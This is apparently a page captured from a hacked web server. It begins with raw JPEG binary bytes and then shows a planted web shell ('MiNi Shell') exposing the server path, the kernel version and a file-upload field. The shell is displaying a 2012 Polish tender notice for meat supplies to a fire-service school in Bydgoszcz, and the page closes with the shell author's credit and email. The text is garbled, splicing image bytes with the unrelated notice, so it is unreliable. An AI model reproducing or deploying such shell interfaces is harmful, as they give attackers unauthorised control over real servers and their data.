JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/104838-N-2012.html

<p class="kh_header"><b>Bydgoszcz: dostawa mięsa i produktów mięsnych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 104838 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podoficerska Państwowej Straży Pożarnej w Bydgoszczy , ul. Glinki 86, 85-861 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3498400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sppsp.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa mięsa i produktów mięsnych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mięsa i produktów mięsnych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy zgodnie z ilościami zamieszczonymi w SIWZ. 
Zakres zamówienia obejmuje dostawę:  łopatka wieprzowa/pieczeniowa bez skóry b/k kl.1 3200kg, szynka wieprzowa surowa  bez skóry kl.1 2000kg, karkówka bez kości 2000kg, schab wieprzowy z/k kl.1 2000kg ,schab wieprzowy b/k kl.1 500kg, wątroba wieprzowa 700kg, boczek świeży bez skóry i żeber 300kg, żołądki wieprzowe surowe 700kg, żołądki wołowe surowe 200kg, smalec wieprzowy w opak. foliowym 300kg, golonka wieprzowa b/k przednia 300kg, golonka wieprzowa z/k przednia 1000kg, żeberka wieprzowe luksusowe 500kg, wołowina b/k extra 200kg, wołowina b/k pieczeniowa kl.1 200kg, kiełbasa śląska 600kg, kiełbasa Starowiejska 100kg , kiełbasa toruńska 200kg, kiełbasa podwawelska 1000kg, kiełbasa wiejska pieczona 400kg, kiełbasa jałowcowa 200kg, kiełbasa jałowcowa 200kg, kiełbasa zwyczajna 900kg, kiełbasa biała surowa gruba - jelito naturalne 600kg,  kiełbasa biała sur. delikatesowa 300kg, smerfy 300kg, dębicka 300kg, kiełbasa zielono górska 300kg, golonkowa blok 200kg, szynka golonkowa 300kg, łopatka zapiekana 300kg, łopatka prasowana 300kg, mielonka familijna 300kg, szynka delikatesowa 100kg,  salceson ozorkowy 300kg, mielonka słoikowa, mielonka regionalna, szynka biała 200kg, kiełbasa szynkowa 100kg, szynkówka wieprzowa 100kg, salami kujawski parzone 200kg, kiełbasa żywiecka- sucha  skład mięsa /min/69% 300kg, kiełbasa krakowska parzona 300kg, kabanosy - jelito naturalne skład mięsa wieprzowego min/92% 500kg, kiełbasa tatrzańska sucha skład mięsa69% 200kg, kiełbasa krakowska sucha skład mięsa wieprzowego 99% 300kg, frankfurterki 300kg, polędwica sopocka 500kg, ogonówka wędzona 100kg, kiełbasa myśliwska 400kg, polędwica wędzona kl.1 300kg, szynka pieczona kl.1 200kg, baleron gotowany 500kg, schab wędzony kl.1 300kg, salami koszalińskie skład mięsa wieprzowego 99% 300 kg, bydgoska ekstra surowa 200kg, metka tatarska 300kg, szynka wieprzowa gotowana 500kg, pieczeń rzymska 500kg, boczek wędzony parzony bez żeber  1400kg, boczek wędzony bez żeber 100kg, szynka z pieprzem 500kg, pasztetowa kremowa jelito naturalne 200kg, pasztetowa wędzona jelito naturalne 300kg,  metka kujawska 100kg, metka wędzona 100kg, parówki cienkie jelito naturalne 400kg, parówki tradycyjne grube jelito naturalne 400kg, salceson wiejski biały 100kg, kaszanka cienka jelito naturalne 400kg, kaszanka blok 400kg, metka cebulowa 200kg, metka łososiowa 300kg, polędwica drobiowa 100kg,szynka z indyka 200kg, parówki koktajlowe 100kg, pasztet z indyka zapiekany 600kg, filet z indyka pieczony 400kg, kurczak filet  2300kg, kurczak noga(cała) 2000kg, rosołowe 1500kg, filet z indyka 10kg, kurczak cały 10kg, wątroba drobiowa 500kg, skrzydło z kurczaka 100kg, konserwa turystyczna (180-200g) skład mięsa wieprzowego min.92% 600kg, pasztet z drobiu z pieczarkami (110-131g) z samootwieraczem 393kg, pasztet z drobiu z pomidorami (110-131g)z samootwieraczem  262kg, szynka konserwowa skład mięsa 51%(125-156g)z samootwieraczem 200kg, szynka konserwowa min.65,8% mięsa wieprzowego(4000-5000g) 800kg, lunchmeat konserwowy (2500- 3000g)  800kg.
Podane ilości są szacunkowe i nie muszą być zakupione w całości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.11.00-0, 15.11.20.00-6, 15.11.30.00-3, 15.13.10.00-5, 15.13.11.20-2, 15.13.11.30-5, 15.13.11.33-6, 15.13.11.34-3, 15.13.11.35-0, 15.13.12.10-0, 15.13.12.30-6, 15.13.13.10-1, 15.13.14.00-9, 15.13.14.10-2, 15.13.15.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie przewiduje się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonego oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonego oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonego oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonego oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonego oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; Pełnomocnictwo jeśli jest wymagane (oznacza to, że jeżeli upoważnienie do podpisywania dokumentów przetargowych nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - odpisu z właściwego rejestru - to do oferty należy dołączyć oryginał lub poświadczoną notarialnie kopię stosownego pełnomocnictwa wystawionego przez osoby do tego upoważnione. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć odpowiednie pełnomocnictwo w oryginale lub kopii potwierdzonej notarialnie; Wykaz asortymentu (załącznik nr 5, 6 lub 7 specyfikacji); Oświadczenie o posiadaniu systemu HACCP w zakresie wytwarzania i produkcji żywności; Ponadto : 1)zaoferować artykuły posiadające stosowne normy jakościowe i dopuszczone do obrotu  w Polsce,
2)towar ma być wykonany zgodnie z obowiązującymi przepisami polskiego prawa żywnościowego,3)sporządzić ofertę zgodnie z wymaganymi przepisami prawa oraz treścią niniejszej specyfikacji,4)wskazać w ofercie te części zamówienia, których wykonanie powierzy podwykonawcom,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.75</li>
<li>2 - Bilans cenowy - 0.25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie i na poniższych warunkach:

23a) W okresie obowiązywania umowy Odbiorca zastrzega sobie prawo nie wybierania  szacowanej ilości towaru określonego w specyfikacji istotnych warunków zamówienia .
23b) W przypadku wyczerpania przed końcem realizacji umowy ilości oraz wartości w poszczególnym asortymencie określonym w umowie, Odbiorca przewiduje możliwość dodatkowego zakupu asortymentu do końca realizacji umowy. W takiej sytuacji warunki dostawy nie ulegną zmianie, a wartość dodatkowych dostaw nie może przekroczyć kwoty uwzględnionej w umowie. Działanie takie nie wymaga sporządzania aneksu do umowy.
23c) Na pisemny wniosek Dostawcy, uzasadniający podwyżkę cen wynikającą z sytuacji rynkowej (w tym również zmianę stawki podatku VAT), Odbiorca może wyrazić zgodę na ich zmianę. Na tę okoliczność zostanie sporządzony i podpisany przez Strony aneks do umowy.
23d) Jeżeli w okresie obowiązywania umowy Dostawca będzie stosował ceny sprzedaży na aktualny dzień niższe niż przedstawione w załączniku nr 1 to zobowiązany jest je stosować w stosunku do Odbiorcy (również w przypadku zmiany stawki podatku VAT).
23e) Zmiany producenta dostarczanego towaru na wniosek Dostawcy pod warunkiem, że oferowany asortyment będzie takiej samej lub lepszej jakości oraz w tej samej cenie, a Dostawca uzasadni konieczność dokonania takiej zmiany.
23f) Terminu realizacji przedmiotu zamówienia - gdy wystąpi konieczność zmiany terminu w związku z wydłużającym się postępowaniem lub zaistnieją okoliczności mające wpływ na termin realizacji, a których nie dało się przewidzieć w chwili zawarcia umowy.
23g) Inne niekorzystne dla zamawiającego zmiany umowy dopuszczalne są tylko wówczas, jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie dostaw przez  Dostawcę byłoby połączone z nadmiernymi trudnościami, albo groziłoby mu rażącą stratą, czego nie przewidywał on przy zawarciu umowy.
23h) Zmiany umowy polegające na zmianie danych Dostawcy bez zmian samego Dostawcy (np. zmiana siedziby, adresu, nazwy).
23i) Sytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.

Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, są uprawnieniem Odbiorcy, nie zaś jego obowiązkiem. Każda ewentualna zmiana wymagać będzie odrębnego rozpatrzenia i zasadności jej wprowadzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sppsp.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podoficerska PSP w Bydgoszcz; ul.Glinki 86; 85-861 Bydgoszcz; tel.52 349 84 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 10:30, miejsce: Szkoła Podoficerska PSP w Bydgoszczy, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mięsa i produktów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> łopatka wieprzowa/pieczeniowa bez skóry b/k kl.1 3200kg, szynka wieprzowa surowa  bez skóry kl.1 2000kg, karkówka bez kości 2000kg, schab wieprzowy z/k kl.1 2000kg ,schab wieprzowy b/k kl.1 500kg, wątroba wieprzowa 700kg, boczek świeży bez skóry i żeber 300kg, żołądki wieprzowe surowe 700kg, żołądki wołowe surowe 200kg, smalec wieprzowy w opak. foliowym 300kg, golonka wieprzowa b/k przednia 300kg, golonka wieprzowa z/k przednia 1000kg, żeberka wieprzowe luksusowe 500kg, wołowina b/k extra 200kg, wołowina b/k pieczeniowa kl.1 200kg, kiełbasa śląska 600kg, kiełbasa Starowiejska 100kg , kiełbasa toruńska 200kg, kiełbasa podwawelska 1000kg, kiełbasa wiejska pieczona 400kg, kiełbasa jałowcowa 200kg, kiełbasa jałowcowa 200kg, kiełbasa zwyczajna 900kg, kiełbasa biała surowa gruba - jelito naturalne 600kg,  kiełbasa biała sur. delikatesowa 300kg, smerfy 300kg, dębicka 300kg, kiełbasa zielono górska 300kg, golonkowa blok 200kg, szynka golonkowa 300kg, łopatka zapiekana 300kg, łopatka prasowana 300kg, mielonka familijna 300kg, szynka delikatesowa 100kg,  salceson ozorkowy 300kg, mielonka słoikowa, mielonka regionalna, szynka biała 200kg, kiełbasa szynkowa 100kg, szynkówka wieprzowa 100kg, salami kujawski parzone 200kg, kiełbasa żywiecka- sucha  skład mięsa /min/69% 300kg, kiełbasa krakowska parzona 300kg, kabanosy - jelito naturalne skład mięsa wieprzowego min/92% 500kg, kiełbasa tatrzańska sucha skład mięsa69% 200kg, kiełbasa krakowska sucha skład mięsa wieprzowego 99% 300kg, frankfurterki 300kg, polędwica sopocka 500kg, ogonówka wędzona 100kg, kiełbasa myśliwska 400kg, polędwica wędzona kl.1 300kg, szynka pieczona kl.1 200kg, baleron gotowany 500kg, schab wędzony kl.1 300kg, salami koszalińskie skład mięsa wieprzowego 99% 300 kg, bydgoska ekstra surowa 200kg, metka tatarska 300kg, szynka wieprzowa gotowana 500kg, pieczeń rzymska 500kg, boczek wędzony parzony bez żeber  1400kg, boczek wędzony bez żeber 100kg, szynka z pieprzem 500kg, pasztetowa kremowa jelito naturalne 200kg, pasztetowa wędzona jelito naturalne 300kg,  metka kujawska 100kg, metka wędzona 100kg, parówki cienkie jelito naturalne 400kg, parówki tradycyjne grube jelito naturalne 400kg, salceson wiejski biały 100kg, kaszanka cienka jelito naturalne 400kg, kaszanka blok 400kg, metka cebulowa 200kg, metka łososiowa 300kg, polędwica drobiowa 100kg,szynka z indyka 200kg, parówki koktajlowe 100kg, pasztet z indyka zapiekany 600kg, filet z indyka pieczony 400kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.20-2, 15.13.11.33-6, 15.13.11.34-3, 15.13.11.35-0, 15.13.12.10-0, 15.13.12.30-6, 15.13.13.10-1, 15.13.14.00-9, 15.10.00.00-2, 15.11.11.00-0, 15.11.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. bilans cenowy - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mięsa i produktów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kurczak filet  2300kg, kurczak noga(cała) 2000kg, rosołowe 1500kg, filet z indyka 10kg, kurczak cały 10kg, wątroba drobiowa 500kg, skrzydło z kurczaka 100kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. bilans cenowy - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa mięsa i produktów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwa turystyczna (180-200g) skład mięsa wieprzowego min.92% 600kg, pasztet z drobiu z pieczarkami (110-131g) z samootwieraczem 393kg, pasztet z drobiu z pomidorami (110-131g)z samootwieraczem  262kg, szynka konserwowa skład mięsa 51%(125-156g)z samootwieraczem 200kg, szynka konserwowa min.65,8% mięsa wieprzowego(4000-5000g) 800kg, lunchmeat konserwowy (2500- 3000g)  800kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. bilans cenowy - 0.25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com